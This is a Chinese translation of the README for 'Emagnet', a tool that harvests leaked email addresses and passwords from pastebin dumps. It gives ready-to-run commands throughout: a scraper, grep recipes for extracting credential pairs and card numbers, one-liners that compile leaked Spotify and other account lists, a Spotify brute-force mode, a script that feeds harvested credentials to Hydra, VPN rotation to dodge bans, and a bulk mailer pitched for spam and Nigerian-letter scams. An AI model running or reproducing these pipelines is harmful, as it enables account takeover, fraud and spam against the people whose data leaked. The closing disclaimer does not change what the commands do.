Emagnet是一款非常强大的工具,其主要目的是从pastebin上传的泄漏数据库中捕获电子邮件地址和密码。当密码在pastebin.com上不在列表中时,几乎不可能找到泄露的密码。他们已被pastebin的技术人员删除,或仅仅只有个别人上传。说实话,这比在大海中捞针要容易,然后使用我们想要收集的数据在pastebin上查找过时的上传内容。
SSH Bruterforcer无法完全正常工作
使用termux app时Android设备的依赖包不能与brute force tools + screen一起使用
将错误数据发送到emagnet.log中,以获取包含正确数据的文件
下图左侧为你运行时所看到的界面,右侧为后台实际运行的内容。
当然一切都会被存储到日志目录(过滤的电子邮件地址)
git clone https://github.com/wuseman/emagnet
cd emagnet
chmod +x emagnet*
.
./emagnet --emagnet
没有termux也能正常工作,但你必须安装wget+curl
从play store下载termux
安装完成后,复制并粘贴以下命令:
echo -e '
pkg update
pkg upgrade -y
pkg install wget curl git -y
git clone https://github.com/wuseman/emagnet
cd emagnet
bash emagnet --emagnet' > emagnet-termux.sh
bash emagnet-termux.sh
请访问我的installation wiki以获取更多信息(包括视频)
现在耐心将会是你成功的关键!:-)
问:为什么不直接使用curl来获取URL,并在我们被临时禁止时使用tor来更改IP?
答:因为我们必须完成验证,然后才能获取href=”https://www.cloudflare.com/5xx-error-landing?utm_source=iuam作为响应。如果你只是想偶尔从pastebin中抓取一些上传,你可以在shell中复制并粘贴以下代码。
cat << EOF > emagnet-curl.sh
#!/bin/bash
curl -Ls https://pastebin.com|grep -o -E 'href="([^"#]+)"' | cut -d'"' -f2|grep archive -A10 | sed -n 2,9p|sed 's/^/http:\/\/pastebin.com\/raw/g' > /tmp/.emagnet
while read line; do wget -q \$line; done < /tmp/.emagnet
clear
printf "Successfully downloaded $(cat /tmp/.emagnet|wc -l) files from pastebin:\n$(cat /tmp/.emagnet|cut -d/ -f5|xargs)"
EOF
chmod +x emagnet-curl.sh
bash emagnet-curl.sh
问:为什么要删除auto bruteforce泄露邮件地址的功能?
答:它已被重新添加到Emagnet,接下来会添加支持更多协议的bruter。敬请期待!
问:如何搜索visa或万事达卡,我想知道我的卡是否已泄露?
答:获取一些上传后,在你的shell中复制并粘贴以下内容:
source /etc/emagnet.conf;grep -rieo '\(^\|[^0-9]\)\{1\}\([345]\{1\}[0-9]\{3\}\|6011\)\{1\}[-]\?[0-9]\{4\}[-]\? [0-9]\{2\}[-]\?[0-9]\{2\}-\?[0-9]\{1,4\}\($\|[^0-9]\)\{1\}' $EMAGNET
问:Emagnet给我返回的结果为null,只是一遍又一遍地再次尝试,然后pastebin要求重新验证。我该怎么办?
答:打开浏览器,跳转到https://pastebin.com并输入re-captch即可,如果这还不行 – 那就先等待一段时间或使用VPN获取新的IP。除非你知道如何绕过验证码,否则在这种情况下,任何工具都无法正常工作。
在Windows 10上安装Emagnet
1) Install Ubuntu or any other distro from Microsoft Store
2) When installation has been done, hit 'start'
3) Now type 'sudo -s' and enter your password
4) Now update repo and install git, just copy and paste the below lines
apt update; apt install git -y; git clone https://github.com/wuseman/emagnet
cd emagnet;chmod +x ./emagnet; ./emagnet --emagnet
注意关于视频:—> 你不再需要运行emagnet-setup,只需运行emagnet即可。
你可以在shell中复制并粘贴以下代码
git clone https://github.com/wuseman/EMAGNET
cd EMAGNET;bash emagnet --emagnet
你可以在shell中复制并粘贴以下代码
git clone https://github.com/wuseman/EMAGNET
cd EMAGNET;bash emagnet --emagnet
echo -e '
pkg update
pkg upgrade -y
pkg install wget curl git -y
git clone https://github.com/wuseman/emagnet
cd emagnet
bash emagnet --emagnet' > emagnet-termux.sh
bash emagnet-termux.sh
使用emagnet ‘spam’ -(这不是垃圾邮件功能)
那么为什么这会被添加到brute tool中呢?
如果你经营一家企业,想要快速轻松地把你的垃圾邮件发送给其他人。
如果你是想传播尼日利亚信件,你可以用这个功能。
如果你想把你的广告转发给新朋友。
你必须先安装ssmtp才能使用它。
Gentoo
emerge --ask ssmtp
Debian/Ubuntu/Kali/Mint and other apt distros:
apt install ssmtp
安装完成后,编辑设置值并复制并粘贴到终端中就可以了!
以下是一个gmail的例子:
cat < "EOF" > /etc/ssmtp/ssmtp.conf
user="Wuzeman Emagnetzon"
mailhub=smtp.gmail.com:587
rewriteDomain=gmail.com
# hostname=yourlocalhost.yourlocaldomain.tld
TLS_CA_FILE=/etc/pki/tls/certs/ca-bundle.crt
UseTLS=Yes
UseSTARTTLS=Yes
[email protected]
AuthPass=<password>
AuthMethod=LOGIN
FromLineOverride=yes
EOF
现在运行emagnet,直到你有一些邮件地址:
./emagnet -e
然后,运行:
./emagnet -s
现在,你将看到要向多少个电子邮件地址发送邮件,如果你选择“yes”,那么你将发送邮件。就这么简单!
_ _______ _
_dMMMb._ .adOOOOOOOOOba. _,dMMMb_
dP' ~YMMb dOOOOOOOOOOOOOOOb aMMP~ `Yb
V ~"Mb dOOOOOOOOOOOOOOOOOb dM"~ V
`Mb. dOOOOOOOOOOOOOOOOOOOb ,dM'
`YMb._ |OOOOOOOOOOOOOOOOOOOOO| _,dMP'
__ `YMMM| OP'~"YOOOOOOOOOOOP"~`YO |MMMP' __
,dMMMb. ~~' OO `YOOOOOP' OO `~~ ,dMMMb.
_,dP~ `YMba_ OOb `OOO' dOO _aMMP' ~Yb._
`YMMMM\`OOOo OOO oOOO'/MMMMP'
,aa. `~YMMb `OOOb._,dOOOb._,dOOO'dMMP~' ,aa.
,dMYYMba._ `OOOOOOOOOOOOOOOOO' _,adMYYMb.
,MP' `YMMba._ OOOOOOOOOOOOOOOOO _,adMMP' `YM.
MP' ~YMMMba._ YOOOOPVVVVVYOOOOP _,adMMMMP~ `YM
YMb ~YMMMM\`OOOOI`````IOOOOO'/MMMMP~ dMP
`Mb. `YMMMb`OOOI,,,,,IOOOO'dMMMP' ,dM'
`' `OObNNNNNdOO' `'
`~OOOOO~'
=================================================================
Targets: 8
- Do you want to send an email to all targets (yes/NO): yes
===============================================================
[+] Sending email to [email protected]....................[.ok.]
[+] Sending email to [email protected]....................[.ok.]
[+] Sending email to [email protected]....................[.ok.]
[+] Sending email to [email protected]....................[.ok.]
[+] Sending email to [email protected]....................[.ok.]
[+] Sending email to [email protected]....................[.ok.]
[+] Sending email to [email protected]....................[.ok.]
[+] Sending email to [email protected]....................[.ok.]
........... and so on
在GNU/Linux Gentoo上支持emagnet的发行版,只需执行以下操作:
emerge --ask eselect-repository
eselect repository enable palmer
eix-sync;eix-update
emerge --ask =dev-libs/libspotify-12.1.51
emerge --ask media-libs/portaudio
现在你已准备好暴破spotify账户:
bash emagnet --bruteforce spotify
在Ubuntu/Kali/Debian上:
wget -q -O - https://apt.mopidy.com/mopidy.gpg | sudo apt-key add -
wget -q -O /etc/apt/sources.list.d/mopidy.list https://apt.mopidy.com/stretch.list
sudo apt-get update
sudo apt-get install libspotify12 libspotify-dev libportaudio
现在你已准备好暴破spotify账户:
bash emagnet --bruteforce spotify
使用你的providers名称在/etc/openvpn中创建一个文件夹,例如hidemyass:
mkdir -p /etc/openvpn/hidemyass
从提供商主页下载配置文件,并将其解压缩到以上创建的文件夹中。
这里概述了如何使vpn工作(不要忘记将provider和vpn设置为true)
CountryCode Name Your Files As Below For Get VPN Running:
........................................................................
be = belgium /etc/openvpn/vpnprovider/vpnprovider.be.ovpn
bg = bulgaria /etc/openvpn/vpnprovider/vpnprovider.bg.ovpn
cz = czech republic /etc/openvpn/vpnprovider/vpnprovider.cz.ovpn
dk = denmark /etc/openvpn/vpnprovider/vpnprovider.dk.ovpn
es = spain /etc/openvpn/vpnprovider/vpnprovider.es.ovpn
fi = finland /etc/openvpn/vpnprovider/vpnprovider.fi.ovpn
gb = great britain /etc/openvpn/vpnprovider/vpnprovider.gb.ovpn
gr = greece /etc/openvpn/vpnprovider/vpnprovider.gr.ovpn
hk = hong-kong (.ch) /etc/openvpn/vpnprovider/vpnprovider.hk.ovpn
hu = hungary /etc/openvpn/vpnprovider/vpnprovider.hu.ovpn
it = italy /etc/openvpn/vpnprovider/vpnprovider.it.ovpn
md = moldavia /etc/openvpn/vpnprovider/vpnprovider.md.ovpn
nl = netherlands /etc/openvpn/vpnprovider/vpnprovider.nl.ovpn
no = norway /etc/openvpn/vpnprovider/vpnprovider.no.ovpn
pl = poland /etc/openvpn/vpnprovider/vpnprovider.pl.ovpn
pt = portugal /etc/openvpn/vpnprovider/vpnprovider.pt.ovpn
ro = romania /etc/openvpn/vpnprovider/vpnprovider.ro.ovpn
se = sweden config nr 1 /etc/openvpn/vpnprovider/vpnprovider.se.ovpn
se2 = sweden config nr 2 /etc/openvpn/vpnprovider/vpnprovider.se2.ovpn
se3 = sweden config nr 3 /etc/openvpn/vpnprovider/vpnprovider.se3.ovpn
se4 = sweden config nr 4 /etc/openvpn/vpnprovider/vpnprovider.se4.ovpn
us = united states /etc/openvpn/vpnprovider/vpnprovider.us.ovpn
当然,如果这是一个新的设置,那么不要忘记在必要时添加你的login登录文件:
for files in ./etc/openvpn/proivder/*; do sed -i 's/auth-user-pass/auth-user-pass login.txt/g' "${files}"; done
请参阅emagnet.conf中的VPNCOUNTRYS,了解默认情况下可用的国家/地区以及emagnet如何读取文件。当然,你也可以将国家编辑为任何其他地方。
如果你有两个providers,甚至是三个,请按上述步骤操作,但请为你的其他providers编辑VPNPROVIDER2和3,并在VPNCOUNTRYS2和3之后用国家名称命名。
示例脚本,用于快速启动暴破:
根据需要修改:
cat > my-bruteforce-tool.sh <<EOF
#!/bin/bash
# inotify-tools is required for this sample
# Where emagnet.conf is stored so you can read folders
. /path/to/emagnet.conf
# Where to place email + passwords we have found wich will be our target
HYDRA_TARGETS="/tmp/.emagnet-hydra-targets.txt"
# When something happens in emagnet's temp folder
# then search for email+password combos and if something is found
# then your command will be triggered and attack the targets.
while inotifywait -e modify "${EMAGNETTEMP}"; do
PASTEBIN_TARGETS=$(grep -rEiEio "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b:...*" "${EMAGNETTEMP}"|awk '{print $1}'| \
cut -d: -f2,3|uniq|grep -v ''\|'/'\|'"'\|','\|'<'\|'>'\|'\/'\|'\\'|grep -v '/' > "${HYDRA_TARGETS}")
# If the target file is empty, then we monitor the dir again
# until emagnet download new files otherwise use the prefered tool and attack your targets
if [[ -s "${HYDRA_TARGETS}" ]]; then
<add your hydra or prefered tool here>
fi
done
EOF
更改权限,以执行脚本:
chmod +x my-bruteforce-tool.sh
运行脚本:
./my-bruteforce-tool.sh
并在另一个窗口同时启动emagnet。
./emagnet --emagnet
搜索和正则表达式
在文件夹中,你将存储来自pastebin上传的所有下载,你可以搜索几乎任何内容,以下是我为大家提供的一些示例。
Facebook 泄露
Facebook Passwords很多次上传是使用电话号码而不是邮件地址,并且东部有很多泄露,为了快速找到这些密码,你可以尝试运行以下命令获取结果:
grep -r -e 'Facebook = [0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]' -A2
以上命令的输出:
/emagnet/pastebin/ajfafilename:Email Facebook = 0895xxxxxxxx
/emagnet/pastebin/ajfafilename-Pass = konxxxxxxxx
/emagnet/pastebin/ajfafilename:Email Facebook = 0858xxxxxxxx
/emagnet/pastebin/ajfafilename-Pass = mxxxxxxxx
/emagnet/pastebin/ajfafilename:Email Facebook = 0895xxxxxxxx
/emagnet/pastebin/ajfafilename-Pass = taxxxxxxxx
/emagnet/pastebin/ajfafilename:Email Facebook = 0823xxxxxxxx
/emagnet/pastebin/ajfafilename-Pass = oxxxxxxxx
/emagnet/pastebin/ajfafilename:Email Facebook = 0818xxxxxxxx
/emagnet/pastebin/ajfafilename-Pass = d1xxxxxxxx
IPV4 地址
grep -roE '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' .
HTTP/HTTPS URLS
Example 1:
grep -rEo '(ftp|ftps|http|https)://[^/"]+'
Example 2:
grep -Eo "(ftp|ftps|http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq
Example 3:
cat * | tr \" \\n | grep https\*://
Example 4 – > 在暗网上查找URL,请使用以下命令:
grep -rEo '.*[.]onion$
示例1的输出:
filename:https://www.beachcolony.com
filename:http://java.sun.com
filename:http://www.w3.org
filename:https://br1.api.riotgames.com
filename:https://github.com
filename:http://openocd.org
Ddfadfae:https://www.googletagservices.com
filenamw:https://www.googletagservices.com
filename:ftp://111.111.111:3200
filename:http://www.pornbb.org
filename:http://www.pornbb.org
filename:http://www.pornbb.org
.............
查找图片:
filename:http://imag-some-site-ekle.com/1/0/v6/hiddenimagevywusewman.jpg
filename:http://images-some-site.com/1/w/4m/hiddenimagevywusewman.jpg
filename:http://imagessome-sitele.com/1/5/8l/yhiddenimagevywusewman.png
filename:http://imsome-sitees-brsome-siteacklesome-sitem/1/0/16/hiddenimagevywusewman.jpg
grep -rioE '(http|https)://(.*).png' # PNG FILES
grep -rioE '(http|https)://(.*).jpg' # JPG FILES
egrep -rio 'http.*[.]jpe?g'
查找泄露密码:
大部分泄露的密码格式为’[email protected]:passwd’,你可以使用以下命令抓取它们:
grep -HiEhr -o -e "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b:...*" | grep '\S'
[email protected]:hiddenPASS985
[email protected]:hiddenPASSina
[email protected]:hiddenPASSro60
[email protected]:hiddenPASSRZ47
[email protected]:hiddenPASScde
[email protected]:hiddenPASSrmia
[email protected]:hiddenPASSudal
[email protected]:hiddenPASSino
[email protected]:hiddenPASSton
[email protected]:hiddenPASSiglio
[email protected]:hiddenPASS0780
[email protected]:vhiddenPASSina
搜索帐户时获得更友好的用户输出:
1)首先,搜索包含你要查找单词的所有文件,在此示例中,我将搜索所有SPOTIFY帐户:
find /opt/emagnet/archive/ -type f | parallel -k -j150% -n 1000 -m grep -H -in 'spotify' {}
2)你可能已经发现当我只搜索’spotify’时会发生很大的混乱……那么,我会把所有’MAIL ADDRESSES’+'SPOTIFY’改为:
grep -rEiEio "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b:...*"
3)我想要逐行排序所有内容,而不是这里或那里有许多空格我们可以使用\S:
grep '\S'
4)我不关心文件名,因为我们现在想要收集的是’MAIL ADDRESSES’ + ‘PASSWORDS’:
cut -d: -f2,3
5)泄漏所有关于pastebin的数据的人有不同的形式来分隔内容,所以让我们跳过所有包含’mail|;/password’/的形式,而将目标锁定在mail:passwords上,因为这是最常用的形式,如果我们想的话,稍后可以很容易地过滤掉它,但要尽可能简单地保存它。
awk -F'|' '{print$1}'|cut -d/ -f1
6)现在我还想保持列表的排序:
sort -r
7)当然我也不需要重复的内容:
awk -F, '!seen[$1]++'
8)如果你希望所有帐户和密码都在一个单独的文件中,可以使用bash中的>>将数据写入文件。如果你想要将详细信息分开,你可以使用 : 或任何你想要使用的字符,如果你想将列表导入你自己的sql/mysql数据库,你可以使用sed来达到这个目的:
commands here from above | _sed 's/:/,/g'_ > leaked-spotify-accounts-20190401_to_20190405.txt
将以上命令整合为一条单行命令:
find /opt/emagnet/archive/ -type f | parallel -k -j150% -n 1000 -m grep -H -in 'spotify' {} | grep -rEiEio "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b:...*"|grep '\S' | cut -d: -f2,3|awk -F'|' '{print$1}'|cut -d/ -f1|sort -r|less|awk -F, '!seen[$1]++' > leaked-spotify-accounts-20190401_to_20190405.txt
你只需将’spotify’更改为其他目标如gmail,paypal,facebook,twitter等等即可。
Bash – 在此处查找有关bash的更多信息
Wget – 在此处查找有关wget的更多信息
Curl – 在此处查找有关curl的更多信息
BBC NEWS: “Pastebin: Running the site where hackers publicise their attacks”
严格禁止通过emagnet攻击不同类型的帐户,这些帐户是你未被授予或允许攻击的,因此这将违反法律。在一些国家你可能因此入狱。当你克隆或下载它时,即表明你需要对自己的行为完全负责。wuseman不会对任何用户的行为负责,所有责任都将由使用者自行承担。
另外,如果你认为该项目的开发是出于违法目的,那么我对你的意见不感兴趣,请自行保留!Emagnet不会向任何开发人员或其他个人或组织泄露任何用户数据。没有任何统计数据可以跟踪任何用户,所以如果你询问我有关这方面的问题,我只能回答不知道,说实话我也不在乎。
最后,我要在此感谢m1st每天为我们提供的合法泄露。
*参考来源:GitHub,FB小编secist编译,转载请注明来自FreeBuf.COM